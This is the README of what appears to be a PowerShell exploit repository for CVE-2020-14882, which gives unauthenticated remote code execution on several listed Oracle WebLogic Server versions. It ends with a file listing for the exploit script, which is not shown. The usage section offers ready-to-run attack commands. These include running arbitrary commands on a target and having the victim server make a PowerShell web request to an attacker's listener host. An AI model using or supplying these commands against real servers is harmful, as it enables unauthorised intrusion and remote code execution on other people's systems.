CVE-2020-14882 rewritten in PowerShell# Oracle WebLogic Unauthenticated RCE Exploit
This PowerShell script exploits CVE-2020-14882 to achieve unauthenticated remote code execution on Oracle WebLogic Server versions:
- 10.3.6.0.0
- 12.1.3.0.0
- 12.2.1.3.0
- 12.2.1.4.0
- 14.1.1.0.0
## Usage
```powershell
.\exploit.ps1 -target 'http(s)://target:7001' -command 'your_command'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'nslookup your_Domain'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'powershell.exe -c Invoke-WebRequest -Uri http://your_listener'
```
## References
[Exploit on ExploitDB](https://www.exploit-db.com/exploits/49479)
[4.0K] /data/pocs/fc8522f0cef9e82ee53ee672383dae99285b8045
├── [1.3K] 48971.ps1
└── [ 622] README.md
0 directories, 2 files